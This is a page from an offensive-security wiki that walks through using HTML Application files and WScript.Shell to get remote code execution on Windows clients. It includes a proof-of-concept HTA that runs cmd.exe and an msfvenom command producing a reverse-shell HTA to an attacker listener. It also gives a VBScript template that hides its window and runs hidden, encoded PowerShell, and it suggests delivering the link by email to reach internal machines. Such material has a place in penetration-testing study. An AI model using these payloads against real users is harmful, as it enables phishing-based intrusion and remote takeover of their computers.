> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/privilege-escalation/windows-escalation/popular-exploits/activexobject-to-wscript-rce.md).

# ActiveXObject to Wscript RCE

In this example, we will leverage ActiveXObjects, which can potentially (and dangerously) provide access to underlying operating system commands. This can be achieved through the Windows Script Host functionality or WScript and in particular the Windows Script Host Shell object. Once we instantiate a Windows Script Host Shell object, we can invoke its run method in order to launch an application on the target client machine.&#x20;

\--------------------poc.hta--------------------

var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c);self.close();

We can save this and serve it with apache. This will open cmd on the users computer. The user will be prompted with:

![](/files/b6yxuav9RxM7v5YrHedG)

then if they click to open it they will get:

![](/files/wNgspcmvTbiPYbRuSBh1)

This second message is when the internet explorer sandbox “Protected Mode” is turned on (default).\
mshta.exe also will have its own cmd prompt open which is why we close it after we launch our window/process\
\
**RCE:**\
$ `msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta`\
//this format is hta-2-powershell\
\
\ <mark style="color:yellow;">-nop</mark> , is shorthand for <mark style="color:yellow;">-NoProfile</mark> , which instructs PowerShell not to load the PowerShell user profile. When PowerShell is started, it will, by default, load any existing user’s profile scripts, which might negatively impact the execution of our code.\ <mark style="color:yellow;">-w</mark> hidden (shorthand for <mark style="color:yellow;">-WindowStyle</mark> hidden )\ <mark style="color:yellow;">-e</mark> flag (shorthand for <mark style="color:yellow;">-EncodedCommand</mark> ) allows us to supply a Base64 encoded PowerShell script directly as a command line argument.<br>

\----------------- evil.hta-----------------\
\<html>\
\<head>\
\<script language="VBScript">\
window\.moveTo -4000, -4000\
Set iKqr8BWFyuiK = CreateObject("Wscript.Shell")\
Set t6tI2tnp = CreateObject("Scripting.FileSystemObject")\
For each path in Split(iKqr8BWFyuiK.ExpandEnvironmentStrings("%PSModulePath%"),";")\
If t6tI2tnp.FileExists(path + "\\..\powershell.exe") Then\
iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e PUT\_YOUR\_BASE64\_ENCODED\_COMMAND\_HERE\
\</script>\
\</head>\
\<body>\
\<script>\
self.close();\
\</script>\
\</body>\
\</html>\
\
\-----------------------Then open a listener and wait for the user to trigger it -----------------

\
Since the link to the HTML Application can be\
delivered via email, we can even compromise NAT’d internal clients.
